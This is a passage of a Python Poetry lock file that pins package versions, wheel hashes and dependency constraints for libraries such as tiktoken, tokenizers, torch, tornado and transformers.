"tiktoken-0.3.3-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:d1f37fa75ba70c1bc7806641e8ccea1fba667d23e6341a1591ea333914c226a9"}, {file = "tiktoken-0.3.3-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:3d7296c38392a943c2ccc0b61323086b8550cef08dcf6855de9949890dbc1fd3"}, {file = "tiktoken-0.3.3-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3c84491965e139a905280ac28b74baaa13445b3678e07f96767089ad1ef5ee7b"}, {file = "tiktoken-0.3.3-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:65970d77ea85ce6c7fce45131da9258cd58a802ffb29ead8f5552e331c025b2b"}, {file = "tiktoken-0.3.3-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:bd3f72d0ba7312c25c1652292121a24c8f1711207b63c6d8dab21afe4be0bf04"}, {file = "tiktoken-0.3.3-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:719c9e13432602dc496b24f13e3c3ad3ec0d2fbdb9aace84abfb95e9c3a425a4"}, {file = "tiktoken-0.3.3-cp310-cp310-win_amd64.whl", hash = "sha256:dc00772284c94e65045b984ed7e9f95d000034f6b2411df252011b069bd36217"}, {file = "tiktoken-0.3.3-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:4db2c40f79f8f7a21a9fdbf1c6dee32dea77b0d7402355dc584a3083251d2e15"}, {file = "tiktoken-0.3.3-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:e3c0f2231aa3829a1a431a882201dc27858634fd9989898e0f7d991dbc6bcc9d"}, {file = "tiktoken-0.3.3-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:48c13186a479de16cfa2c72bb0631fa9c518350a5b7569e4d77590f7fee96be9"}, {file = "tiktoken-0.3.3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6674e4e37ab225020135cd66a392589623d5164c6456ba28cc27505abed10d9e"}, {file = "tiktoken-0.3.3-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:4a0c1357f6191211c544f935d5aa3cb9d7abd118c8f3c7124196d5ecd029b4af"}, {file = "tiktoken-0.3.3-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:2e948d167fc3b04483cbc33426766fd742e7cefe5346cd62b0cbd7279ef59539"}, {file = "tiktoken-0.3.3-cp311-cp311-win_amd64.whl", hash = "sha256:5dca434c8680b987eacde2dbc449e9ea4526574dbf9f3d8938665f638095be82"}, {file = "tiktoken-0.3.3-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:984758ebc07cd8c557345697c234f1f221bd730b388f4340dd08dffa50213a01"}, {file = "tiktoken-0.3.3-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:891012f29e159a989541ae47259234fb29ff88c22e1097567316e27ad33a3734"}, {file = "tiktoken-0.3.3-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:210f8602228e4c5d706deeb389da5a152b214966a5aa558eec87b57a1969ced5"}, {file = "tiktoken-0.3.3-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:dd783564f80d4dc44ff0a64b13756ded8390ed2548549aefadbe156af9188307"}, {file = "tiktoken-0.3.3-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:03f64bde9b4eb8338bf49c8532bfb4c3578f6a9a6979fc176d939f9e6f68b408"}, {file = "tiktoken-0.3.3-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:1ac369367b6f5e5bd80e8f9a7766ac2a9c65eda2aa856d5f3c556d924ff82986"}, {file = "tiktoken-0.3.3-cp38-cp38-win_amd64.whl", hash = "sha256:94600798891f78db780e5aa9321456cf355e54a4719fbd554147a628de1f163f"}, {file = "tiktoken-0.3.3-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:e59db6fca8d5ccea302fe2888917364446d6f4201a25272a1a1c44975c65406a"}, {file = "tiktoken-0.3.3-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:19340d8ba4d6fd729b2e3a096a547ded85f71012843008f97475f9db484869ee"}, {file = "tiktoken-0.3.3-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:542686cbc9225540e3a10f472f82fa2e1bebafce2233a211dee8459e95821cfd"}, {file = "tiktoken-0.3.3-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3a43612b2a09f4787c050163a216bf51123851859e9ab128ad03d2729826cde9"}, {file = "tiktoken-0.3.3-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:a11674f0275fa75fb59941b703650998bd4acb295adbd16fc8af17051aaed19d"}, {file = "tiktoken-0.3.3-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:65fc0a449630bab28c30b4adec257442a4706d79cffc2337c1d9df3e91825cdd"}, {file = "tiktoken-0.3.3-cp39-cp39-win_amd64.whl", hash = "sha256:0b9a7a9a8b781a50ee9289e85e28771d7e113cc0c656eadfb6fc6d3a106ff9bb"}, {file = "tiktoken-0.3.3.tar.gz", hash = "sha256:97b58b7bfda945791ec855e53d166e8ec20c6378942b93851a6c919ddf9d0496"}, ] [package.dependencies] regex = ">=2022.1.18" requests = ">=2.26.0" [package.extras] blobfile = ["blobfile (>=2)"] [[package]] name = "timescale-vector" version = "0.0.1" description = "Python library for storing vector data in Postgres" optional = true python-versions = ">=3.7" files = [ {file = "timescale-vector-0.0.1.tar.gz", hash = "sha256:420d088b1d45e98f5b9770c76ddf826521aa6e813cb4997d24355eaeda1a7775"}, {file = "timescale_vector-0.0.1-py3-none-any.whl", hash = "sha256:81283e8f359387bacd2bd092431a288f34c211968c53b3fed7f3fed1979f39eb"}, ] [package.dependencies] asyncpg = "*" pgvector = "*" psycopg2 = "*" [package.extras] dev = ["python-dotenv"] [[package]] name = "tinycss2" version = "1.2.1" description = "A tiny CSS parser" optional = false python-versions = ">=3.7" files = [ {file = "tinycss2-1.2.1-py3-none-any.whl", hash = "sha256:2b80a96d41e7c3914b8cda8bc7f705a4d9c49275616e886103dd839dfc847847"}, {file = "tinycss2-1.2.1.tar.gz", hash = "sha256:8cff3a8f066c2ec677c06dbc7b45619804a6938478d9d73c284b29d14ecb0627"}, ] [package.dependencies] webencodings = ">=0.4" [package.extras] doc = ["sphinx", "sphinx_rtd_theme"] test = ["flake8", "isort", "pytest"] [[package]] name = "tinysegmenter" version = "0.3" description = "Very compact Japanese tokenizer" optional = true python-versions = "*" files = [ {file = "tinysegmenter-0.3.tar.gz", hash = "sha256:ed1f6d2e806a4758a73be589754384cbadadc7e1a414c81a166fc9adf2d40c6d"}, ] [[package]] name = "tldextract" version = "5.0.1" description = "Accurately separates a URL's subdomain, domain, and public suffix, using the Public Suffix List (PSL). By default, this includes the public ICANN TLDs and their exceptions. You can optionally support the Public Suffix List's private domains as well." optional = true python-versions = ">=3.8" files = [ {file = "tldextract-5.0.1-py3-none-any.whl", hash = "sha256:8322fa2b73d9572c6bde31e96f66b694abb86d85b32ed6082593da806a6d33b4"}, {file = "tldextract-5.0.1.tar.gz", hash = "sha256:ac1c5daa02616e9c2608f5fb6dd93049db03d0cf46c7f6fad46e2850a984f019"}, ] [package.dependencies] filelock = ">=3.0.8" idna = "*" requests = ">=2.1.0" requests-file = ">=1.4" [[package]] name = "tokenizers" version = "0.13.3" description = "Fast and Customizable Tokenizers" optional = false python-versions = "*" files = [ {file = "tokenizers-0.13.3-cp310-cp310-macosx_10_11_x86_64.whl", hash = "sha256:f3835c5be51de8c0a092058a4d4380cb9244fb34681fd0a295fbf0a52a5fdf33"}, {file = "tokenizers-0.13.3-cp310-cp310-macosx_12_0_arm64.whl", hash = "sha256:4ef4c3e821730f2692489e926b184321e887f34fb8a6b80b8096b966ba663d07"}, {file = "tokenizers-0.13.3-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c5fd1a6a25353e9aa762e2aae5a1e63883cad9f4e997c447ec39d071020459bc"}, {file = "tokenizers-0.13.3-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:ee0b1b311d65beab83d7a41c56a1e46ab732a9eed4460648e8eb0bd69fc2d059"}, {file = "tokenizers-0.13.3-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:5ef4215284df1277dadbcc5e17d4882bda19f770d02348e73523f7e7d8b8d396"}, {file = "tokenizers-0.13.3-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a4d53976079cff8a033f778fb9adca2d9d69d009c02fa2d71a878b5f3963ed30"}, {file = "tokenizers-0.13.3-cp310-cp310-win32.whl", hash = "sha256:1f0e3b4c2ea2cd13238ce43548959c118069db7579e5d40ec270ad77da5833ce"}, {file = "tokenizers-0.13.3-cp310-cp310-win_amd64.whl", hash = "sha256:89649c00d0d7211e8186f7a75dfa1db6996f65edce4b84821817eadcc2d3c79e"}, {file = "tokenizers-0.13.3-cp311-cp311-macosx_10_11_universal2.whl", hash = "sha256:56b726e0d2bbc9243872b0144515ba684af5b8d8cd112fb83ee1365e26ec74c8"}, {file = "tokenizers-0.13.3-cp311-cp311-macosx_12_0_arm64.whl", hash = "sha256:cc5c022ce692e1f499d745af293ab9ee6f5d92538ed2faf73f9708c89ee59ce6"}, {file = "tokenizers-0.13.3-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f55c981ac44ba87c93e847c333e58c12abcbb377a0c2f2ef96e1a266e4184ff2"}, {file = "tokenizers-0.13.3-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:f247eae99800ef821a91f47c5280e9e9afaeed9980fc444208d5aa6ba69ff148"}, {file = "tokenizers-0.13.3-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:4b3e3215d048e94f40f1c95802e45dcc37c5b05eb46280fc2ccc8cd351bff839"}, {file = "tokenizers-0.13.3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9ba2b0bf01777c9b9bc94b53764d6684554ce98551fec496f71bc5be3a03e98b"}, {file = "tokenizers-0.13.3-cp311-cp311-win32.whl", hash = "sha256:cc78d77f597d1c458bf0ea7c2a64b6aa06941c7a99cb135b5969b0278824d808"}, {file = "tokenizers-0.13.3-cp311-cp311-win_amd64.whl", hash = "sha256:ecf182bf59bd541a8876deccf0360f5ae60496fd50b58510048020751cf1724c"}, {file = "tokenizers-0.13.3-cp37-cp37m-macosx_10_11_x86_64.whl", hash = "sha256:0527dc5436a1f6bf2c0327da3145687d3bcfbeab91fed8458920093de3901b44"}, {file = "tokenizers-0.13.3-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:07cbb2c307627dc99b44b22ef05ff4473aa7c7cc1fec8f0a8b37d8a64b1a16d2"}, {file = "tokenizers-0.13.3-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:4560dbdeaae5b7ee0d4e493027e3de6d53c991b5002d7ff95083c99e11dd5ac0"}, {file = "tokenizers-0.13.3-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:64064bd0322405c9374305ab9b4c07152a1474370327499911937fd4a76d004b"}, {file = "tokenizers-0.13.3-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b8c6e2ab0f2e3d939ca66aa1d596602105fe33b505cd2854a4c1717f704c51de"}, {file = "tokenizers-0.13.3-cp37-cp37m-win32.whl", hash = "sha256:6cc29d410768f960db8677221e497226e545eaaea01aa3613fa0fdf2cc96cff4"}, {file = "tokenizers-0.13.3-cp37-cp37m-win_amd64.whl", hash = "sha256:fc2a7fdf864554a0dacf09d32e17c0caa9afe72baf9dd7ddedc61973bae352d8"}, {file = "tokenizers-0.13.3-cp38-cp38-macosx_10_11_x86_64.whl", hash = "sha256:8791dedba834c1fc55e5f1521be325ea3dafb381964be20684b92fdac95d79b7"}, {file = "tokenizers-0.13.3-cp38-cp38-macosx_12_0_arm64.whl", hash = "sha256:d607a6a13718aeb20507bdf2b96162ead5145bbbfa26788d6b833f98b31b26e1"}, {file = "tokenizers-0.13.3-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3791338f809cd1bf8e4fee6b540b36822434d0c6c6bc47162448deee3f77d425"}, {file = "tokenizers-0.13.3-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:c2f35f30e39e6aab8716f07790f646bdc6e4a853816cc49a95ef2a9016bf9ce6"}, {file = "tokenizers-0.13.3-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:310204dfed5aa797128b65d63538a9837cbdd15da2a29a77d67eefa489edda26"}, {file = "tokenizers-0.13.3-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a0f9b92ea052305166559f38498b3b0cae159caea712646648aaa272f7160963"}, {file = "tokenizers-0.13.3-cp38-cp38-win32.whl", hash = "sha256:9a3fa134896c3c1f0da6e762d15141fbff30d094067c8f1157b9fdca593b5806"}, {file = "tokenizers-0.13.3-cp38-cp38-win_amd64.whl", hash = "sha256:8e7b0cdeace87fa9e760e6a605e0ae8fc14b7d72e9fc19c578116f7287bb873d"}, {file = "tokenizers-0.13.3-cp39-cp39-macosx_10_11_x86_64.whl", hash = "sha256:00cee1e0859d55507e693a48fa4aef07060c4bb6bd93d80120e18fea9371c66d"}, {file = "tokenizers-0.13.3-cp39-cp39-macosx_12_0_arm64.whl", hash = "sha256:a23ff602d0797cea1d0506ce69b27523b07e70f6dda982ab8cf82402de839088"}, {file = "tokenizers-0.13.3-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:70ce07445050b537d2696022dafb115307abdffd2a5c106f029490f84501ef97"}, {file = "tokenizers-0.13.3-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:280ffe95f50eaaf655b3a1dc7ff1d9cf4777029dbbc3e63a74e65a056594abc3"}, {file = "tokenizers-0.13.3-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:97acfcec592f7e9de8cadcdcda50a7134423ac8455c0166b28c9ff04d227b371"}, {file = "tokenizers-0.13.3-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:dd7730c98a3010cd4f523465867ff95cd9d6430db46676ce79358f65ae39797b"}, {file = "tokenizers-0.13.3-cp39-cp39-win32.whl", hash = "sha256:48625a108029cb1ddf42e17a81b5a3230ba6888a70c9dc14e81bc319e812652d"}, {file = "tokenizers-0.13.3-cp39-cp39-win_amd64.whl", hash = "sha256:bc0a6f1ba036e482db6453571c9e3e60ecd5489980ffd95d11dc9f960483d783"}, {file = "tokenizers-0.13.3.tar.gz", hash = "sha256:2e546dbb68b623008a5442353137fbb0123d311a6d7ba52f2667c8862a75af2e"}, ] [package.extras] dev = ["black (==22.3)", "datasets", "numpy", "pytest", "requests"] docs = ["setuptools-rust", "sphinx", "sphinx-rtd-theme"] testing = ["black (==22.3)", "datasets", "numpy", "pytest", "requests"] [[package]] name = "toml" version = "0.10.2" description = "Python Library for Tom's Obvious, Minimal Language" optional = false python-versions = ">=2.6, !=3.0.*, !=3.1.*, !=3.2.*" files = [ {file = "toml-0.10.2-py2.py3-none-any.whl", hash = "sha256:806143ae5bfb6a3c6e736a764057db0e6a0e05e338b5630894a5f779cabb4f9b"}, {file = "toml-0.10.2.tar.gz", hash = "sha256:b3bda1d108d5dd99f4a20d24d9c348e91c4db7ab1b749200bded2f839ccbe68f"}, ] [[package]] name = "tomli" version = "2.0.1" description = "A lil' TOML parser" optional = false python-versions = ">=3.7" files = [ {file = "tomli-2.0.1-py3-none-any.whl", hash = "sha256:939de3e7a6161af0c887ef91b7d41a53e7c5a1ca976325f429cb46ea9bc30ecc"}, {file = "tomli-2.0.1.tar.gz", hash = "sha256:de526c12914f0c550d15924c62d72abc48d6fe7364aa87328337a31007fe8a4f"}, ] [[package]] name = "toolz" version = "0.12.0" description = "List processing tools and functional utilities" optional = true python-versions = ">=3.5" files = [ {file = "toolz-0.12.0-py3-none-any.whl", hash = "sha256:2059bd4148deb1884bb0eb770a3cde70e7f954cfbbdc2285f1f2de01fd21eb6f"}, {file = "toolz-0.12.0.tar.gz", hash = "sha256:88c570861c440ee3f2f6037c4654613228ff40c93a6c25e0eba70d17282c6194"}, ] [[package]] name = "torch" version = "1.13.1" description = "Tensors and Dynamic neural networks in Python with strong GPU acceleration" optional = true python-versions = ">=3.7.0" files = [ {file = "torch-1.13.1-cp310-cp310-manylinux1_x86_64.whl", hash = "sha256:fd12043868a34a8da7d490bf6db66991108b00ffbeecb034228bfcbbd4197143"}, {file = "torch-1.13.1-cp310-cp310-manylinux2014_aarch64.whl", hash = "sha256:d9fe785d375f2e26a5d5eba5de91f89e6a3be5d11efb497e76705fdf93fa3c2e"}, {file = "torch-1.13.1-cp310-cp310-win_amd64.whl", hash = "sha256:98124598cdff4c287dbf50f53fb455f0c1e3a88022b39648102957f3445e9b76"}, {file = "torch-1.13.1-cp310-none-macosx_10_9_x86_64.whl", hash = "sha256:393a6273c832e047581063fb74335ff50b4c566217019cc6ace318cd79eb0566"}, {file = "torch-1.13.1-cp310-none-macosx_11_0_arm64.whl", hash = "sha256:0122806b111b949d21fa1a5f9764d1fd2fcc4a47cb7f8ff914204fd4fc752ed5"}, {file = "torch-1.13.1-cp311-cp311-manylinux1_x86_64.whl", hash = "sha256:22128502fd8f5b25ac1cd849ecb64a418382ae81dd4ce2b5cebaa09ab15b0d9b"}, {file = "torch-1.13.1-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:76024be052b659ac1304ab8475ab03ea0a12124c3e7626282c9c86798ac7bc11"}, {file = "torch-1.13.1-cp37-cp37m-manylinux2014_aarch64.whl", hash = "sha256:ea8dda84d796094eb8709df0fcd6b56dc20b58fdd6bc4e8d7109930dafc8e419"}, {file = "torch-1.13.1-cp37-cp37m-win_amd64.whl", hash = "sha256:2ee7b81e9c457252bddd7d3da66fb1f619a5d12c24d7074de91c4ddafb832c93"}, {file = "torch-1.13.1-cp37-none-macosx_10_9_x86_64.whl", hash = "sha256:0d9b8061048cfb78e675b9d2ea8503bfe30db43d583599ae8626b1263a0c1380"}, {file = "torch-1.13.1-cp37-none-macosx_11_0_arm64.whl", hash = "sha256:f402ca80b66e9fbd661ed4287d7553f7f3899d9ab54bf5c67faada1555abde28"}, {file = "torch-1.13.1-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:727dbf00e2cf858052364c0e2a496684b9cb5aa01dc8a8bc8bbb7c54502bdcdd"}, {file = "torch-1.13.1-cp38-cp38-manylinux2014_aarch64.whl", hash = "sha256:df8434b0695e9ceb8cc70650afc1310d8ba949e6db2a0525ddd9c3b2b181e5fe"}, {file = "torch-1.13.1-cp38-cp38-win_amd64.whl", hash = "sha256:5e1e722a41f52a3f26f0c4fcec227e02c6c42f7c094f32e49d4beef7d1e213ea"}, {file = "torch-1.13.1-cp38-none-macosx_10_9_x86_64.whl", hash = "sha256:33e67eea526e0bbb9151263e65417a9ef2d8fa53cbe628e87310060c9dcfa312"}, {file = "torch-1.13.1-cp38-none-macosx_11_0_arm64.whl", hash = "sha256:eeeb204d30fd40af6a2d80879b46a7efbe3cf43cdbeb8838dd4f3d126cc90b2b"}, {file = "torch-1.13.1-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:50ff5e76d70074f6653d191fe4f6a42fdbe0cf942fbe2a3af0b75eaa414ac038"}, {file = "torch-1.13.1-cp39-cp39-manylinux2014_aarch64.whl", hash = "sha256:2c3581a3fd81eb1f0f22997cddffea569fea53bafa372b2c0471db373b26aafc"}, {file = "torch-1.13.1-cp39-cp39-win_amd64.whl", hash = "sha256:0aa46f0ac95050c604bcf9ef71da9f1172e5037fdf2ebe051962d47b123848e7"}, {file = "torch-1.13.1-cp39-none-macosx_10_9_x86_64.whl", hash = "sha256:6930791efa8757cb6974af73d4996b6b50c592882a324b8fb0589c6a9ba2ddaf"}, {file = "torch-1.13.1-cp39-none-macosx_11_0_arm64.whl", hash = "sha256:e0df902a7c7dd6c795698532ee5970ce898672625635d885eade9976e5a04949"}, ] [package.dependencies] nvidia-cublas-cu11 = {version = "11.10.3.66", markers = "platform_system == \"Linux\""} nvidia-cuda-nvrtc-cu11 = {version = "11.7.99", markers = "platform_system == \"Linux\""} nvidia-cuda-runtime-cu11 = {version = "11.7.99", markers = "platform_system == \"Linux\""} nvidia-cudnn-cu11 = {version = "8.5.0.96", markers = "platform_system == \"Linux\""} typing-extensions = "*" [package.extras] opt-einsum = ["opt-einsum (>=3.3)"] [[package]] name = "torchvision" version = "0.14.1" description = "image and video datasets and models for torch deep learning" optional = true python-versions = ">=3.7" files = [ {file = "torchvision-0.14.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:eeb05dd9dd3af5428fee525400759daf8da8e4caec45ddd6908cfb36571f6433"}, {file = "torchvision-0.14.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:8d0766ea92affa7af248e327dd85f7c9cfdf51a57530b43212d4e1858548e9d7"}, {file = "torchvision-0.14.1-cp310-cp310-manylinux1_x86_64.whl", hash = "sha256:6d7b35653113664ea3fdcb71f515cfbf29d2fe393000fd8aaff27a1284de6908"}, {file = "torchvision-0.14.1-cp310-cp310-manylinux2014_aarch64.whl", hash = "sha256:8a9eb773a2fa8f516e404ac09c059fb14e6882c48fdbb9c946327d2ce5dba6cd"}, {file = "torchvision-0.14.1-cp310-cp310-win_amd64.whl", hash = "sha256:13986f0c15377ff23039e1401012ccb6ecf71024ce53def27139e4eac5a57592"}, {file = "torchvision-0.14.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:fb7a793fd33ce1abec24b42778419a3fb1e3159d7dfcb274a3ca8fb8cbc408dc"}, {file = "torchvision-0.14.1-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:89fb0419780ec9a9eb9f7856a0149f6ac9f956b28f44b0c0080c6b5b48044db7"}, {file = "torchvision-0.14.1-cp37-cp37m-manylinux2014_aarch64.whl", hash = "sha256:a2d4237d3c9705d7729eb4534e4eb06f1d6be7ff1df391204dfb51586d9b0ecb"}, {file = "torchvision-0.14.1-cp37-cp37m-win_amd64.whl", hash = "sha256:92a324712a87957443cc34223274298ae9496853f115c252f8fc02b931f2340e"}, {file = "torchvision-0.14.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:68ed03359dcd3da9cd21b8ab94da21158df8a6a0c5bad0bf4a42f0e448d28cb3"}, {file = "torchvision-0.14.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:30fcf0e9fe57d4ac4ce6426659a57dce199637ccb6c70be1128670f177692624"}, {file = "torchvision-0.14.1-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:0ed02aefd09bf1114d35f1aa7dce55aa61c2c7e57f9aa02dce362860be654e85"}, {file = "torchvision-0.14.1-cp38-cp38-manylinux2014_aarch64.whl", hash = "sha256:a541e49fc3c4e90e49e6988428ab047415ed52ea97d0c0bfd147d8bacb8f4df8"}, {file = "torchvision-0.14.1-cp38-cp38-win_amd64.whl", hash = "sha256:6099b3191dc2516099a32ae38a5fb349b42e863872a13545ab1a524b6567be60"}, {file = "torchvision-0.14.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:c5e744f56e5f5b452deb5fc0f3f2ba4d2f00612d14d8da0dbefea8f09ac7690b"}, {file = "torchvision-0.14.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:758b20d079e810b4740bd60d1eb16e49da830e3360f9be379eb177ee221fa5d4"}, {file = "torchvision-0.14.1-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:83045507ef8d3c015d4df6be79491375b2f901352cfca6e72b4723e9c4f9a55d"}, {file = "torchvision-0.14.1-cp39-cp39-manylinux2014_aarch64.whl", hash = "sha256:eaed58cf454323ed9222d4e0dd5fb897064f454b400696e03a5200e65d3a1e76"}, {file = "torchvision-0.14.1-cp39-cp39-win_amd64.whl", hash = "sha256:b337e1245ca4353623dd563c03cd8f020c2496a7c5d12bba4d2e381999c766e0"}, ] [package.dependencies] numpy = "*" pillow = ">=5.3.0,<8.3.dev0 || >=8.4.dev0" requests = "*" torch = "1.13.1" typing-extensions = "*" [package.extras] scipy = ["scipy"] [[package]] name = "tornado" version = "6.3.3" description = "Tornado is a Python web framework and asynchronous networking library, originally developed at FriendFeed." optional = false python-versions = ">= 3.8" files = [ {file = "tornado-6.3.3-cp38-abi3-macosx_10_9_universal2.whl", hash = "sha256:502fba735c84450974fec147340016ad928d29f1e91f49be168c0a4c18181e1d"}, {file = "tornado-6.3.3-cp38-abi3-macosx_10_9_x86_64.whl", hash = "sha256:805d507b1f588320c26f7f097108eb4023bbaa984d63176d1652e184ba24270a"}, {file = "tornado-6.3.3-cp38-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1bd19ca6c16882e4d37368e0152f99c099bad93e0950ce55e71daed74045908f"}, {file = "tornado-6.3.3-cp38-abi3-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7ac51f42808cca9b3613f51ffe2a965c8525cb1b00b7b2d56828b8045354f76a"}, {file = "tornado-6.3.3-cp38-abi3-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:71a8db65160a3c55d61839b7302a9a400074c9c753040455494e2af74e2501f2"}, {file = "tornado-6.3.3-cp38-abi3-musllinux_1_1_aarch64.whl", hash = "sha256:ceb917a50cd35882b57600709dd5421a418c29ddc852da8bcdab1f0db33406b0"}, {file = "tornado-6.3.3-cp38-abi3-musllinux_1_1_i686.whl", hash = "sha256:7d01abc57ea0dbb51ddfed477dfe22719d376119844e33c661d873bf9c0e4a16"}, {file = "tornado-6.3.3-cp38-abi3-musllinux_1_1_x86_64.whl", hash = "sha256:9dc4444c0defcd3929d5c1eb5706cbe1b116e762ff3e0deca8b715d14bf6ec17"}, {file = "tornado-6.3.3-cp38-abi3-win32.whl", hash = "sha256:65ceca9500383fbdf33a98c0087cb975b2ef3bfb874cb35b8de8740cf7f41bd3"}, {file = "tornado-6.3.3-cp38-abi3-win_amd64.whl", hash = "sha256:22d3c2fa10b5793da13c807e6fc38ff49a4f6e1e3868b0a6f4164768bb8e20f5"}, {file = "tornado-6.3.3.tar.gz", hash = "sha256:e7d8db41c0181c80d76c982aacc442c0783a2c54d6400fe028954201a2e032fe"}, ] [[package]] name = "tqdm" version = "4.66.1" description = "Fast, Extensible Progress Meter" optional = false python-versions = ">=3.7" files = [ {file = "tqdm-4.66.1-py3-none-any.whl", hash = "sha256:d302b3c5b53d47bce91fea46679d9c3c6508cf6332229aa1e7d8653723793386"}, {file = "tqdm-4.66.1.tar.gz", hash = "sha256:d88e651f9db8d8551a62556d3cff9e3034274ca5d66e93197cf2490e2dcb69c7"}, ] [package.dependencies] colorama = {version = "*", markers = "platform_system == \"Windows\""} [package.extras] dev = ["pytest (>=6)", "pytest-cov", "pytest-timeout", "pytest-xdist"] notebook = ["ipywidgets (>=6)"] slack = ["slack-sdk"] telegram = ["requests"] [[package]] name = "traitlets" version = "5.12.0" description = "Traitlets Python configuration system" optional = false python-versions = ">=3.8" files = [ {file = "traitlets-5.12.0-py3-none-any.whl", hash = "sha256:81539f07f7aebcde2e4b5ab76727f53eabf18ad155c6ed7979a681411602fa47"}, {file = "traitlets-5.12.0.tar.gz", hash = "sha256:833273bf645d8ce31dcb613c56999e2e055b1ffe6d09168a164bcd91c36d5d35"}, ] [package.extras] docs = ["myst-parser", "pydata-sphinx-theme", "sphinx"] test = ["argcomplete (>=3.0.3)", "mypy (>=1.6.0)", "pre-commit", "pytest (>=7.0,<7.5)", "pytest-mock", "pytest-mypy-testing"] [[package]] name = "transformers" version = "4.33.3" description = "State-of-the-art Machine Learning for JAX, PyTorch and TensorFlow" optional = true python-versions = ">=3.8.0" files = [ {file = "transformers-4.33.3-py3-none-any.whl", hash = "sha256:7150bbf6781ddb3338ce7d74f4d6f557e6c236a0a1dd3de57412214caae7fd71"}, {file = "transformers-4.33.3.tar.gz", hash = "sha256:8ea7c92310dee7c63b14766ce928218f7a9177960b2487ac018c91ae621af03e"}, ] [package.dependencies] filelock = "*" huggingface-hub = ">=0.15.1,<1.0" numpy = ">=1.17" packaging = ">=20.0" pyyaml = ">=5.1" regex = "!=2019.12.17" requests = "*" safetensors = ">=0.3.1" tokenizers = ">=0.11.1,<0.11.3 || >0.11.3,<0.14" tqdm = ">=4.27" [package.extras] accelerate = ["accelerate (>=0.20.3)"] agents = ["Pillow (<10.0.0)", "accelerate (>=0.20.3)", "datasets (!=2.5.0)", "diffusers", "opencv-python", "sentencepiece (>=0.1.91,!=0.1.92)", "torch (>=1.10,!=1.12.0)"] all = ["Pillow (<10.0.0)", "accelerate (>=0.20.3)", "av (==9.2.0)", "codecarbon (==1.2.0)", "decord (==0.6.0)", "flax (>=0.4.1,<=0.7.0)", "jax (>=0.4.1,<=0.4.13)", "jaxlib (>=0.4.1,<=0.4.13)", "kenlm", "keras-nlp (>=0.3.1)", "librosa", "onnxconverter-common", "optax (>=0.0.8,<=0.1.4)", "optuna", "phonemizer", 